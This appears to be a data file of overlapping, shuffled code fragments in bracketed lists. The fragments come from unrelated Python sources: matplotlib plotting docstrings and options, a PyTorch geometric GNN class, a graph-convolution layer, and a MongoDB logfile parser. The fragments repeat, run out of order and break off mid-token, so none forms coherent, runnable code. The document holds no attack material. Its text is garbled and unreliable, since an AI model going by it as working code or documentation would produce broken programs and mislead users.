"hlines_linestyles: [optional, defaults to None] List of linestyles for the", "sharex=sharex, sharey=sharey, colors=colors, linestyles=linestyles, markerstyles=markerstyles, bar_hatchstyles=bar_hatchstyles, style=style, logx=logx, logy=logy, xaxis=xaxis,", "for the entire plot. hlines_xmax: [optional, defaults to None] List", "iterate through the available matplotlib line types. Otherwise on the", "None] else i for i in linestyles] markerstyles = [\"", "in [\" \", None] else i for i in linestyles]", "a line style code. grid [optional, default is False] Whether", "of the xaxis. One of 'arithmetic', 'log'. yaxis : str", "Density Estimation or 'hist' for a histogram. bootstrap_size : int", ") colors = [] markerstyles = [] linestyles = []", "# [\"weibull\", \"benard\", \"tukey\", \"gumbel\", \"hazen\", \"cunnane\", \"california\"], # ],", "API. To not display lines use a space (' ')", "List of x values where to place a vertical line.", "associated with the input data. The 'legend_names' option allows you", "data set. subplots [optional, defaults to False] Make separate subplots", "| 'steps-post'] por [optional] Plot from first good value to", "from 1 to 1000, where '--xlim ,1000' would base the", "{index_type} {names} {source_units} {target_units} {round_index} plot_styles: str [optional, default is", "= True xlim = plotutils.know_your_limits(xlim, axis=xaxis) ylim = plotutils.know_your_limits(ylim, axis=yaxis)", "hlines_xmin is None: hlines_xmin = nxlim[0] if hlines_xmax is None:", "be used as the linestyle for all horizontal lines. If", "plot_styles=\"bright\", hlines_y=None, hlines_xmin=None, hlines_xmax=None, hlines_colors=None, hlines_linestyles=\"-\", vlines_x=None, vlines_ymin=None, vlines_ymax=None, vlines_colors=None,", "space (' ') as the linestyle code. Separated 'colors', 'linestyles',", "if i is None else i for i in markerstyles]", "size of the random subset for 'bootstrap' plot. bootstrap_samples [optional,", "| solid | +---------+--------------+ | -- | dashed | +---------+--------------+", "density estimation of probability density function. \"kde\" will create a", "set. You must supply a comma separated list of strings", "[True, False]], 1], # plotting_position=[ # str, # [ #", "are deprecated. * * For --logx use --xaxis=\"log\" * For", "# ], # prob_plot_sort_values=[str, [\"domain\", [\"ascending\", \"descending\"]], 1], # plot_styles=[", "nstyle: colors.append(st[0]) if len(st) == 1: markerstyles.append(\" \") linestyles.append(\"-\") continue", "Python API. +-----------------+-------------------+ | bar_hatchstyles | Description | +=================+===================+ |", "warnings.warn( \"\"\" * * The --logx, --logy, --norm_xaxis, --norm_yaxis, --lognorm_xaxis,", "\"weibull_xaxis\"]: vlines_x = ppf(tsutils.make_list(vlines_x)) plt.vlines( vlines_x, vlines_ymin, vlines_ymax, colors=vlines_colors, linestyles=vlines_linestyles,", "black, white, and gray, however the \"ieee\" also will change", "will be used as the color for all vertical lines.", "functions for the manipulation of time series.\"\"\" from __future__ import", "| +-------+----------------+ | '' | nothing | +-------+----------------+ Marker reference:", "minimum x value for the entire plot. vlines_ymax: [optional, defaults", "\"none\": short_freq = \"\" else: # short freq string (day)", "bootstrap_samples=bootstrap_samples, norm_xaxis=norm_xaxis, norm_yaxis=norm_yaxis, lognorm_xaxis=lognorm_xaxis, lognorm_yaxis=lognorm_yaxis, xy_match_line=xy_match_line, grid=grid, label_rotation=label_rotation, label_skip=label_skip, force_freq=force_freq,", "value for the entire plot. vlines_colors: [optional, defaults to None]", "of linestyles for the horizontal lines. If a single linestyle", "to plot grid lines on the major ticks. label_rotation :", "linestyle for all horizontal lines. If a list must be", "[\"arithmetic\", \"log\"]], 1], # secondary_y=[bool, [\"domain\", [True, False]], 1], #", "], # vlines_x=[float, [\"pass\", []], None], # vlines_ymin=[float, [\"pass\", []],", "plotutils.LINE_LIST], # None, # ], # vlines_x=[float, [\"pass\", []], None],", "'bootstrap_size'. norm_xaxis DEPRECATED: use '--type=\"norm_xaxis\"' instead. norm_yaxis DEPRECATED: use '--type=\"norm_yaxis\"'", "-- | dashed | +---------+--------------+ | -. | dash_dot |", "# por=[bool, [\"domain\", [True, False]], 1], # invert_xaxis=[bool, [\"domain\", [True,", "else: beginstr = 1 if pltfreq == \"none\": short_freq =", "| +---------+--------------+ | None | draw nothing | +---------+--------------+ |", "implementation of # mando legend = bool(legend == \"\" or", "sharey [optional, default to False] In case subplots=True, share y", "lognorm_yaxis is True ): warnings.warn( \"\"\" * * The --logx,", "will return the Matplotlib figure that can then be changed", "por [optional] Plot from first good value to last good", "[optional, default to \"auto\", only used if type equal to", "end. {force_freq} invert_xaxis [optional, default is False] Invert the x-axis.", "types. Otherwise on the command line a comma separated list,", "x value for the entire plot. vlines_ymax: [optional, defaults to", "colors=[str, [\"pass\", []], None], # linestyles=[str, [\"domain\", [\"auto\", None, \"\",", "{plotting_position_table} Only used for norm_xaxis, norm_yaxis, lognorm_xaxis, lognorm_yaxis, weibull_xaxis, and", "\"seaborn-darkgrid\", \"seaborn-deep\", \"seaborn-muted\", \"seaborn-notebook\", \"seaborn-paper\", \"seaborn-pastel\", \"seaborn-poster\", \"seaborn-talk\", \"seaborn-ticks\", \"seaborn-white\",", "white, and gray, however the \"ieee\" also will change the", "figsize=figsize, ) for index, line in enumerate(ax.lines): if icolors is", "+ \".mplstyle\")) else i for i in plot_styles ] plt.style.use(plot_styles)", "of linestyles for the vertical lines. If a single linestyle", "the probability plots. Only used for norm_xaxis, norm_yaxis, lognorm_xaxis, lognorm_yaxis,", "xaxis : str [optional, default is 'arithmetic'] Defines the type", "Set to a line style code. grid [optional, default is", "[\"pass\", []], 1], # figsize=[float, [\"range\", [0, None]], 2], #", "values for all vertical lines. A missing value or None", "# \"seaborn-colorblind\", # \"seaborn-dark\", # \"seaborn-dark-palette\", # \"seaborn-darkgrid\", # \"seaborn-deep\"," ]
[ "-> dict: raise NotImplementedError def forward(self, batch: Batch, output_all_steps=True): edge_index", "self.mp_steps: continue for element, readout_fn in self.readout_fns.items(): outputs[element].append(readout_fn(**hiddens)) return outputs", "\"batch\") else None ) hiddens = self.initialize(batch) del batch #", "super().__init__() self.mp_steps = mp_steps self.update_fns = self.assign_update_fns() self.readout_fns = self.assign_readout_fns()", "if not output_all_steps and (step + 1) != self.mp_steps: continue", "edge_index = batch.edge_index sections = ( torch.bincount(batch.batch).tolist() if hasattr(batch, \"batch\")", "= ( torch.bincount(batch.batch).tolist() if hasattr(batch, \"batch\") else None ) hiddens", "step(self, edge_index, sections, **hiddens): \"\"\" Perform a message passing step", "hiddens[f\"{element}_embedding\"], hiddens[f\"{element}_lstm\"] = update_fn( edge_index=edge_index, sections=sections, element=element, **hiddens ) return", "( torch.bincount(batch.batch).tolist() if hasattr(batch, \"batch\") else None ) hiddens =", "for element, update_fn in self.update_fns.items(): hiddens[f\"{element}_embedding\"], hiddens[f\"{element}_lstm\"] = update_fn( edge_index=edge_index,", "} ) return hiddens def step(self, edge_index, sections, **hiddens): \"\"\"", "as nn from torch_geometric.data.batch import Batch class GNN(nn.Module): def __init__(self,", "{element: [] for element in self.readout_fns.keys()} for step in range(self.mp_steps):", "self.initialize(batch) del batch # update attributes with update and aggregation", "outputs def initialize(self, batch): hiddens = {} # initialize attributes", "torch.nn as nn from torch_geometric.data.batch import Batch class GNN(nn.Module): def", "mp_steps self.update_fns = self.assign_update_fns() self.readout_fns = self.assign_readout_fns() def assign_update_fns(self) ->", "# update attributes with update and aggregation step outputs =", "not output_all_steps and (step + 1) != self.mp_steps: continue for", "hasattr(batch, \"batch\") else None ) hiddens = self.initialize(batch) del batch", "step by propagating information and updating each element \"\"\" for", "initialize(self, batch): hiddens = {} # initialize attributes trough embeddings", "self.step(edge_index=edge_index, sections=sections, **hiddens) if not output_all_steps and (step + 1)", "sections = ( torch.bincount(batch.batch).tolist() if hasattr(batch, \"batch\") else None )", "nn from torch_geometric.data.batch import Batch class GNN(nn.Module): def __init__(self, mp_steps,", "intialize lstm states to None for element in self.embeddings.keys(): embedding", "raise NotImplementedError def assign_readout_fns(self) -> dict: raise NotImplementedError def forward(self,", "!= self.mp_steps: continue for element, readout_fn in self.readout_fns.items(): outputs[element].append(readout_fn(**hiddens)) return", "self.assign_readout_fns() def assign_update_fns(self) -> OrderedDict: raise NotImplementedError def assign_readout_fns(self) ->", "-> OrderedDict: raise NotImplementedError def assign_readout_fns(self) -> dict: raise NotImplementedError", "f\"{element}_input\": embedding, f\"{element}_embedding\": embedding.clone(), f\"{element}_lstm\": None, } ) return hiddens", "readout_fn in self.readout_fns.items(): outputs[element].append(readout_fn(**hiddens)) return outputs def initialize(self, batch): hiddens", "step in range(self.mp_steps): hiddens = self.step(edge_index=edge_index, sections=sections, **hiddens) if not", "element in self.readout_fns.keys()} for step in range(self.mp_steps): hiddens = self.step(edge_index=edge_index,", "Batch class GNN(nn.Module): def __init__(self, mp_steps, **config): super().__init__() self.mp_steps =", "= batch.edge_index sections = ( torch.bincount(batch.batch).tolist() if hasattr(batch, \"batch\") else", "NotImplementedError def assign_readout_fns(self) -> dict: raise NotImplementedError def forward(self, batch:", "embedding.clone(), f\"{element}_lstm\": None, } ) return hiddens def step(self, edge_index,", "OrderedDict import torch import torch.nn as nn from torch_geometric.data.batch import", ") hiddens = self.initialize(batch) del batch # update attributes with", "= self.assign_update_fns() self.readout_fns = self.assign_readout_fns() def assign_update_fns(self) -> OrderedDict: raise", "None, } ) return hiddens def step(self, edge_index, sections, **hiddens):", "mp_steps, **config): super().__init__() self.mp_steps = mp_steps self.update_fns = self.assign_update_fns() self.readout_fns", "self.update_fns = self.assign_update_fns() self.readout_fns = self.assign_readout_fns() def assign_update_fns(self) -> OrderedDict:", "for step in range(self.mp_steps): hiddens = self.step(edge_index=edge_index, sections=sections, **hiddens) if", "embeddings and intialize lstm states to None for element in", "self.embeddings.keys(): embedding = self.embeddings[element](batch[f\"{element}_input\"]) hiddens.update( { f\"{element}_input\": embedding, f\"{element}_embedding\": embedding.clone(),", "def step(self, edge_index, sections, **hiddens): \"\"\" Perform a message passing", "Perform a message passing step by propagating information and updating", "self.readout_fns.keys()} for step in range(self.mp_steps): hiddens = self.step(edge_index=edge_index, sections=sections, **hiddens)", "= {} # initialize attributes trough embeddings and intialize lstm", "hiddens = self.initialize(batch) del batch # update attributes with update", "update_fn in self.update_fns.items(): hiddens[f\"{element}_embedding\"], hiddens[f\"{element}_lstm\"] = update_fn( edge_index=edge_index, sections=sections, element=element,", "batch): hiddens = {} # initialize attributes trough embeddings and", "import Batch class GNN(nn.Module): def __init__(self, mp_steps, **config): super().__init__() self.mp_steps", "f\"{element}_lstm\": None, } ) return hiddens def step(self, edge_index, sections,", "range(self.mp_steps): hiddens = self.step(edge_index=edge_index, sections=sections, **hiddens) if not output_all_steps and", "edge_index, sections, **hiddens): \"\"\" Perform a message passing step by", "raise NotImplementedError def forward(self, batch: Batch, output_all_steps=True): edge_index = batch.edge_index", "= mp_steps self.update_fns = self.assign_update_fns() self.readout_fns = self.assign_readout_fns() def assign_update_fns(self)", "# initialize attributes trough embeddings and intialize lstm states to", "self.readout_fns = self.assign_readout_fns() def assign_update_fns(self) -> OrderedDict: raise NotImplementedError def", "self.update_fns.items(): hiddens[f\"{element}_embedding\"], hiddens[f\"{element}_lstm\"] = update_fn( edge_index=edge_index, sections=sections, element=element, **hiddens )", "aggregation step outputs = {element: [] for element in self.readout_fns.keys()}", "element \"\"\" for element, update_fn in self.update_fns.items(): hiddens[f\"{element}_embedding\"], hiddens[f\"{element}_lstm\"] =", "def assign_readout_fns(self) -> dict: raise NotImplementedError def forward(self, batch: Batch,", "sections, **hiddens): \"\"\" Perform a message passing step by propagating", "{ f\"{element}_input\": embedding, f\"{element}_embedding\": embedding.clone(), f\"{element}_lstm\": None, } ) return", "from torch_geometric.data.batch import Batch class GNN(nn.Module): def __init__(self, mp_steps, **config):", "information and updating each element \"\"\" for element, update_fn in", "hiddens[f\"{element}_lstm\"] = update_fn( edge_index=edge_index, sections=sections, element=element, **hiddens ) return hiddens", "class GNN(nn.Module): def __init__(self, mp_steps, **config): super().__init__() self.mp_steps = mp_steps", "Batch, output_all_steps=True): edge_index = batch.edge_index sections = ( torch.bincount(batch.batch).tolist() if", "def assign_update_fns(self) -> OrderedDict: raise NotImplementedError def assign_readout_fns(self) -> dict:", "= self.initialize(batch) del batch # update attributes with update and", "in self.readout_fns.keys()} for step in range(self.mp_steps): hiddens = self.step(edge_index=edge_index, sections=sections,", "NotImplementedError def forward(self, batch: Batch, output_all_steps=True): edge_index = batch.edge_index sections", "None for element in self.embeddings.keys(): embedding = self.embeddings[element](batch[f\"{element}_input\"]) hiddens.update( {", "import torch.nn as nn from torch_geometric.data.batch import Batch class GNN(nn.Module):", "attributes with update and aggregation step outputs = {element: []", "\"\"\" Perform a message passing step by propagating information and", "in range(self.mp_steps): hiddens = self.step(edge_index=edge_index, sections=sections, **hiddens) if not output_all_steps", ") return hiddens def step(self, edge_index, sections, **hiddens): \"\"\" Perform", "= {element: [] for element in self.readout_fns.keys()} for step in", "import torch import torch.nn as nn from torch_geometric.data.batch import Batch", "in self.embeddings.keys(): embedding = self.embeddings[element](batch[f\"{element}_input\"]) hiddens.update( { f\"{element}_input\": embedding, f\"{element}_embedding\":", "update attributes with update and aggregation step outputs = {element:", "torch import torch.nn as nn from torch_geometric.data.batch import Batch class", "+ 1) != self.mp_steps: continue for element, readout_fn in self.readout_fns.items():", "batch.edge_index sections = ( torch.bincount(batch.batch).tolist() if hasattr(batch, \"batch\") else None", "states to None for element in self.embeddings.keys(): embedding = self.embeddings[element](batch[f\"{element}_input\"])", "torch.bincount(batch.batch).tolist() if hasattr(batch, \"batch\") else None ) hiddens = self.initialize(batch)", "outputs = {element: [] for element in self.readout_fns.keys()} for step", "batch # update attributes with update and aggregation step outputs", "= self.embeddings[element](batch[f\"{element}_input\"]) hiddens.update( { f\"{element}_input\": embedding, f\"{element}_embedding\": embedding.clone(), f\"{element}_lstm\": None,", "hiddens.update( { f\"{element}_input\": embedding, f\"{element}_embedding\": embedding.clone(), f\"{element}_lstm\": None, } )", "hiddens def step(self, edge_index, sections, **hiddens): \"\"\" Perform a message", "self.mp_steps = mp_steps self.update_fns = self.assign_update_fns() self.readout_fns = self.assign_readout_fns() def", "update and aggregation step outputs = {element: [] for element", "in self.readout_fns.items(): outputs[element].append(readout_fn(**hiddens)) return outputs def initialize(self, batch): hiddens =", "forward(self, batch: Batch, output_all_steps=True): edge_index = batch.edge_index sections = (", "hiddens = self.step(edge_index=edge_index, sections=sections, **hiddens) if not output_all_steps and (step", "import OrderedDict import torch import torch.nn as nn from torch_geometric.data.batch", "collections import OrderedDict import torch import torch.nn as nn from", "to None for element in self.embeddings.keys(): embedding = self.embeddings[element](batch[f\"{element}_input\"]) hiddens.update(", "if hasattr(batch, \"batch\") else None ) hiddens = self.initialize(batch) del", "return outputs def initialize(self, batch): hiddens = {} # initialize", "hiddens = {} # initialize attributes trough embeddings and intialize", "by propagating information and updating each element \"\"\" for element,", "batch: Batch, output_all_steps=True): edge_index = batch.edge_index sections = ( torch.bincount(batch.batch).tolist()", "element, update_fn in self.update_fns.items(): hiddens[f\"{element}_embedding\"], hiddens[f\"{element}_lstm\"] = update_fn( edge_index=edge_index, sections=sections,", "self.embeddings[element](batch[f\"{element}_input\"]) hiddens.update( { f\"{element}_input\": embedding, f\"{element}_embedding\": embedding.clone(), f\"{element}_lstm\": None, }", "\"\"\" for element, update_fn in self.update_fns.items(): hiddens[f\"{element}_embedding\"], hiddens[f\"{element}_lstm\"] = update_fn(", "else None ) hiddens = self.initialize(batch) del batch # update", "self.assign_update_fns() self.readout_fns = self.assign_readout_fns() def assign_update_fns(self) -> OrderedDict: raise NotImplementedError", "torch_geometric.data.batch import Batch class GNN(nn.Module): def __init__(self, mp_steps, **config): super().__init__()", "OrderedDict: raise NotImplementedError def assign_readout_fns(self) -> dict: raise NotImplementedError def", "attributes trough embeddings and intialize lstm states to None for", "self.readout_fns.items(): outputs[element].append(readout_fn(**hiddens)) return outputs def initialize(self, batch): hiddens = {}", "from collections import OrderedDict import torch import torch.nn as nn", "def __init__(self, mp_steps, **config): super().__init__() self.mp_steps = mp_steps self.update_fns =", "element, readout_fn in self.readout_fns.items(): outputs[element].append(readout_fn(**hiddens)) return outputs def initialize(self, batch):", "embedding = self.embeddings[element](batch[f\"{element}_input\"]) hiddens.update( { f\"{element}_input\": embedding, f\"{element}_embedding\": embedding.clone(), f\"{element}_lstm\":", "**config): super().__init__() self.mp_steps = mp_steps self.update_fns = self.assign_update_fns() self.readout_fns =", "sections=sections, **hiddens) if not output_all_steps and (step + 1) !=", "dict: raise NotImplementedError def forward(self, batch: Batch, output_all_steps=True): edge_index =", "[] for element in self.readout_fns.keys()} for step in range(self.mp_steps): hiddens", "(step + 1) != self.mp_steps: continue for element, readout_fn in", "in self.update_fns.items(): hiddens[f\"{element}_embedding\"], hiddens[f\"{element}_lstm\"] = update_fn( edge_index=edge_index, sections=sections, element=element, **hiddens", "a message passing step by propagating information and updating each", "**hiddens): \"\"\" Perform a message passing step by propagating information", "__init__(self, mp_steps, **config): super().__init__() self.mp_steps = mp_steps self.update_fns = self.assign_update_fns()", "and updating each element \"\"\" for element, update_fn in self.update_fns.items():", "trough embeddings and intialize lstm states to None for element", "def initialize(self, batch): hiddens = {} # initialize attributes trough", "output_all_steps and (step + 1) != self.mp_steps: continue for element,", "initialize attributes trough embeddings and intialize lstm states to None", "for element in self.readout_fns.keys()} for step in range(self.mp_steps): hiddens =", "GNN(nn.Module): def __init__(self, mp_steps, **config): super().__init__() self.mp_steps = mp_steps self.update_fns", "message passing step by propagating information and updating each element", "assign_update_fns(self) -> OrderedDict: raise NotImplementedError def assign_readout_fns(self) -> dict: raise", "{} # initialize attributes trough embeddings and intialize lstm states", "for element, readout_fn in self.readout_fns.items(): outputs[element].append(readout_fn(**hiddens)) return outputs def initialize(self,", "for element in self.embeddings.keys(): embedding = self.embeddings[element](batch[f\"{element}_input\"]) hiddens.update( { f\"{element}_input\":", "1) != self.mp_steps: continue for element, readout_fn in self.readout_fns.items(): outputs[element].append(readout_fn(**hiddens))", "return hiddens def step(self, edge_index, sections, **hiddens): \"\"\" Perform a", "step outputs = {element: [] for element in self.readout_fns.keys()} for", "and intialize lstm states to None for element in self.embeddings.keys():", "and (step + 1) != self.mp_steps: continue for element, readout_fn", "element in self.embeddings.keys(): embedding = self.embeddings[element](batch[f\"{element}_input\"]) hiddens.update( { f\"{element}_input\": embedding,", "passing step by propagating information and updating each element \"\"\"", "continue for element, readout_fn in self.readout_fns.items(): outputs[element].append(readout_fn(**hiddens)) return outputs def", "with update and aggregation step outputs = {element: [] for", "def forward(self, batch: Batch, output_all_steps=True): edge_index = batch.edge_index sections =", "f\"{element}_embedding\": embedding.clone(), f\"{element}_lstm\": None, } ) return hiddens def step(self,", "= self.assign_readout_fns() def assign_update_fns(self) -> OrderedDict: raise NotImplementedError def assign_readout_fns(self)", "lstm states to None for element in self.embeddings.keys(): embedding =", "assign_readout_fns(self) -> dict: raise NotImplementedError def forward(self, batch: Batch, output_all_steps=True):", "= self.step(edge_index=edge_index, sections=sections, **hiddens) if not output_all_steps and (step +", "each element \"\"\" for element, update_fn in self.update_fns.items(): hiddens[f\"{element}_embedding\"], hiddens[f\"{element}_lstm\"]", "None ) hiddens = self.initialize(batch) del batch # update attributes", "**hiddens) if not output_all_steps and (step + 1) != self.mp_steps:", "updating each element \"\"\" for element, update_fn in self.update_fns.items(): hiddens[f\"{element}_embedding\"],", "output_all_steps=True): edge_index = batch.edge_index sections = ( torch.bincount(batch.batch).tolist() if hasattr(batch,", "and aggregation step outputs = {element: [] for element in", "outputs[element].append(readout_fn(**hiddens)) return outputs def initialize(self, batch): hiddens = {} #", "del batch # update attributes with update and aggregation step", "embedding, f\"{element}_embedding\": embedding.clone(), f\"{element}_lstm\": None, } ) return hiddens def", "propagating information and updating each element \"\"\" for element, update_fn" ]
[ "__repr__(self): return self.__class__.__name__ + ' (' + self.name + ')'", "adj): output_1 = self.gcn_1(input, adj) output_1_relu = self.relu1(output_1) output_2 =", "as nn from torch.nn.modules.module import Module from GNN.GCN_layer import GraphConvolution", "self.gcn_1(input, adj) output_1_relu = self.relu1(output_1) output_2 = self.gcn_2(output_1_relu, adj) output_2_res", "+ input output = self.relu2(output_2_res) return output def __repr__(self): return", "import torch.nn as nn from torch.nn.modules.module import Module from GNN.GCN_layer", "% name) self.gcn_2 = GraphConvolution(state_dim, '%s_2' % name) self.relu1 =", "= nn.ReLU() self.relu2 = nn.ReLU() self.name = name def forward(self,", "GraphResConvolution(Module): \"\"\" Simple GCN layer, similar to https://arxiv.org/abs/1609.02907 \"\"\" def", "input, adj): output_1 = self.gcn_1(input, adj) output_1_relu = self.relu1(output_1) output_2", "def __repr__(self): return self.__class__.__name__ + ' (' + self.name +", "self.name = name def forward(self, input, adj): output_1 = self.gcn_1(input,", "input output = self.relu2(output_2_res) return output def __repr__(self): return self.__class__.__name__", "= state_dim self.gcn_1 = GraphConvolution(state_dim, '%s_1' % name) self.gcn_2 =", "return output def __repr__(self): return self.__class__.__name__ + ' (' +", "'%s_2' % name) self.relu1 = nn.ReLU() self.relu2 = nn.ReLU() self.name", "\"\"\" Simple GCN layer, similar to https://arxiv.org/abs/1609.02907 \"\"\" def __init__(self,", "torch import torch.nn as nn from torch.nn.modules.module import Module from", "import Module from GNN.GCN_layer import GraphConvolution class GraphResConvolution(Module): \"\"\" Simple", "= self.gcn_1(input, adj) output_1_relu = self.relu1(output_1) output_2 = self.gcn_2(output_1_relu, adj)", "import math import torch import torch.nn as nn from torch.nn.modules.module", "name=''): super(GraphResConvolution, self).__init__() self.state_dim = state_dim self.gcn_1 = GraphConvolution(state_dim, '%s_1'", "= self.gcn_2(output_1_relu, adj) output_2_res = output_2 + input output =", "self.state_dim = state_dim self.gcn_1 = GraphConvolution(state_dim, '%s_1' % name) self.gcn_2", "import GraphConvolution class GraphResConvolution(Module): \"\"\" Simple GCN layer, similar to", "adj) output_1_relu = self.relu1(output_1) output_2 = self.gcn_2(output_1_relu, adj) output_2_res =", "GraphConvolution(state_dim, '%s_2' % name) self.relu1 = nn.ReLU() self.relu2 = nn.ReLU()", "self.relu1 = nn.ReLU() self.relu2 = nn.ReLU() self.name = name def", "name def forward(self, input, adj): output_1 = self.gcn_1(input, adj) output_1_relu", "nn.ReLU() self.relu2 = nn.ReLU() self.name = name def forward(self, input,", "nn from torch.nn.modules.module import Module from GNN.GCN_layer import GraphConvolution class", "= output_2 + input output = self.relu2(output_2_res) return output def", "torch.nn.modules.module import Module from GNN.GCN_layer import GraphConvolution class GraphResConvolution(Module): \"\"\"", "__init__(self, state_dim, name=''): super(GraphResConvolution, self).__init__() self.state_dim = state_dim self.gcn_1 =", "self.gcn_2(output_1_relu, adj) output_2_res = output_2 + input output = self.relu2(output_2_res)", "torch.nn as nn from torch.nn.modules.module import Module from GNN.GCN_layer import", "'%s_1' % name) self.gcn_2 = GraphConvolution(state_dim, '%s_2' % name) self.relu1", "self.relu2 = nn.ReLU() self.name = name def forward(self, input, adj):", "similar to https://arxiv.org/abs/1609.02907 \"\"\" def __init__(self, state_dim, name=''): super(GraphResConvolution, self).__init__()", "nn.ReLU() self.name = name def forward(self, input, adj): output_1 =", "self.relu1(output_1) output_2 = self.gcn_2(output_1_relu, adj) output_2_res = output_2 + input", "= name def forward(self, input, adj): output_1 = self.gcn_1(input, adj)", "adj) output_2_res = output_2 + input output = self.relu2(output_2_res) return", "GraphConvolution(state_dim, '%s_1' % name) self.gcn_2 = GraphConvolution(state_dim, '%s_2' % name)", "to https://arxiv.org/abs/1609.02907 \"\"\" def __init__(self, state_dim, name=''): super(GraphResConvolution, self).__init__() self.state_dim", "class GraphResConvolution(Module): \"\"\" Simple GCN layer, similar to https://arxiv.org/abs/1609.02907 \"\"\"", "output_1_relu = self.relu1(output_1) output_2 = self.gcn_2(output_1_relu, adj) output_2_res = output_2", "from GNN.GCN_layer import GraphConvolution class GraphResConvolution(Module): \"\"\" Simple GCN layer,", "def forward(self, input, adj): output_1 = self.gcn_1(input, adj) output_1_relu =", "output_1 = self.gcn_1(input, adj) output_1_relu = self.relu1(output_1) output_2 = self.gcn_2(output_1_relu,", "% name) self.relu1 = nn.ReLU() self.relu2 = nn.ReLU() self.name =", "GraphConvolution class GraphResConvolution(Module): \"\"\" Simple GCN layer, similar to https://arxiv.org/abs/1609.02907", "name) self.relu1 = nn.ReLU() self.relu2 = nn.ReLU() self.name = name", "GNN.GCN_layer import GraphConvolution class GraphResConvolution(Module): \"\"\" Simple GCN layer, similar", "super(GraphResConvolution, self).__init__() self.state_dim = state_dim self.gcn_1 = GraphConvolution(state_dim, '%s_1' %", "name) self.gcn_2 = GraphConvolution(state_dim, '%s_2' % name) self.relu1 = nn.ReLU()", "self.gcn_1 = GraphConvolution(state_dim, '%s_1' % name) self.gcn_2 = GraphConvolution(state_dim, '%s_2'", "= GraphConvolution(state_dim, '%s_2' % name) self.relu1 = nn.ReLU() self.relu2 =", "<reponame>vivek-r-2000/BoundaryNet<gh_stars>10-100 import math import torch import torch.nn as nn from", "= self.relu1(output_1) output_2 = self.gcn_2(output_1_relu, adj) output_2_res = output_2 +", "forward(self, input, adj): output_1 = self.gcn_1(input, adj) output_1_relu = self.relu1(output_1)", "import torch import torch.nn as nn from torch.nn.modules.module import Module", "Module from GNN.GCN_layer import GraphConvolution class GraphResConvolution(Module): \"\"\" Simple GCN", "def __init__(self, state_dim, name=''): super(GraphResConvolution, self).__init__() self.state_dim = state_dim self.gcn_1", "= GraphConvolution(state_dim, '%s_1' % name) self.gcn_2 = GraphConvolution(state_dim, '%s_2' %", "math import torch import torch.nn as nn from torch.nn.modules.module import", "layer, similar to https://arxiv.org/abs/1609.02907 \"\"\" def __init__(self, state_dim, name=''): super(GraphResConvolution,", "\"\"\" def __init__(self, state_dim, name=''): super(GraphResConvolution, self).__init__() self.state_dim = state_dim", "output_2 = self.gcn_2(output_1_relu, adj) output_2_res = output_2 + input output", "Simple GCN layer, similar to https://arxiv.org/abs/1609.02907 \"\"\" def __init__(self, state_dim,", "https://arxiv.org/abs/1609.02907 \"\"\" def __init__(self, state_dim, name=''): super(GraphResConvolution, self).__init__() self.state_dim =", "self).__init__() self.state_dim = state_dim self.gcn_1 = GraphConvolution(state_dim, '%s_1' % name)", "GCN layer, similar to https://arxiv.org/abs/1609.02907 \"\"\" def __init__(self, state_dim, name=''):", "self.gcn_2 = GraphConvolution(state_dim, '%s_2' % name) self.relu1 = nn.ReLU() self.relu2", "= nn.ReLU() self.name = name def forward(self, input, adj): output_1", "self.relu2(output_2_res) return output def __repr__(self): return self.__class__.__name__ + ' ('", "output = self.relu2(output_2_res) return output def __repr__(self): return self.__class__.__name__ +", "from torch.nn.modules.module import Module from GNN.GCN_layer import GraphConvolution class GraphResConvolution(Module):", "state_dim, name=''): super(GraphResConvolution, self).__init__() self.state_dim = state_dim self.gcn_1 = GraphConvolution(state_dim,", "= self.relu2(output_2_res) return output def __repr__(self): return self.__class__.__name__ + '", "output_2_res = output_2 + input output = self.relu2(output_2_res) return output", "output_2 + input output = self.relu2(output_2_res) return output def __repr__(self):", "output def __repr__(self): return self.__class__.__name__ + ' (' + self.name", "state_dim self.gcn_1 = GraphConvolution(state_dim, '%s_1' % name) self.gcn_2 = GraphConvolution(state_dim," ]
[ "moved_from = \"Unknown\" note = match.group('note') if note == \"success\":", "streams or stdin.\"\"\" def __init__(self, filehandle): \"\"\"Provide logfile as open", "if not self._num_lines: self._iterate_lines() return self._num_lines @property def restarts(self): \"\"\"Lazy", "seek position is wrong line = self.filehandle.readline() if isinstance(line, bytes):", "because next() iterator uses internal readahead # buffer so seek", "if isinstance(line, bytes): line = line.decode(\"utf-8\", \"replace\") if self.binary ==", "previous file position for loop detection in _find_curr_line() self.prev_pos =", "\"\"\"Lazily return the chunks moved from this shard (if available)\"\"\"", "over file and find any sharding related information \"\"\" self._shards", "parsing loop detected trying to find previous \" \"log line", "return self.next() self.filehandle.seek(newline_pos - jump_back + 1, 1) # roll", "(\"is now in state\" in line and # next(state for", "datetime format.\"\"\" if self._year_rollover is None: self._calculate_bounds() return self._year_rollover @property", "not self._shards: self._find_sharding_info() return self._shards @property def csrs(self): \"\"\"Lazily return", "match = re.search(' _id: \"(?P<replSet>\\S+)\".*' 'members: (?P<replSetMembers>[^]]+ ])', line) if", "auto-split chunk\" in line: logevent = LogEvent(line) match = re.search(\"chunk", "self._shards.append(shard_info) elif self.binary == \"mongod\": logevent = LogEvent(line) if \"New", "next(self): \"\"\"Get next line, adjust for year rollover and hint", "repl_set_members(self): \"\"\"Return the replSet (if available).\"\"\" if not self._num_lines: self._iterate_lines()", "engine. There were only two engines, MMAPv1 and WiredTiger \"\"\"", "the storage engine. There were only two engines, MMAPv1 and", "self._iterate_lines() return self._repl_set_protocol @property def storage_engine(self): \"\"\"Return storage engine if", "to eliminate most lines) if \"version\" in line[:100]: logevent =", "input currently. \"\"\" if self.from_stdin: return None if not self._filesize:", "next(state for state in states if line.endswith(state))): if \"is now", "file position for loop detection in _find_curr_line() self.prev_pos = None", ":: (?P<error>\\S+): ', line) if match: time = logevent.datetime split_range", "has any level lines.\"\"\" if self._has_level is None: self._iterate_lines() return", "in logevent.line_str or 'mongos' in logevent.line_str): self._binary = 'mongos' else:", "le = self.next() if le.datetime and le.datetime >= start_dt: self.filehandle.seek(0)", "self._csrs and match.group('replSet') != self._csrs[0]: self._shards.append(( match.group('replSet'), match.group('replSetMembers') )) elif", "admin.$cmd command: { replSetInitiate:\" in line: match = re.search('{ _id:", "adjust for year rollover and hint datetime format.\"\"\" # use", "if match: csrs_info = (match.group('csrsName'), match.group('replSetMembers')) self._csrs = csrs_info else:", "loop detection in _find_curr_line() self.prev_pos = None self._has_level = None", "if not self._num_lines: self._iterate_lines() return self._hostname @property def port(self): \"\"\"Lazy", "== 'initandlisten' and \"db version v\" in logevent.line_str): self._binary =", "0 self._restarts = [] self._rs_state = [] ln = 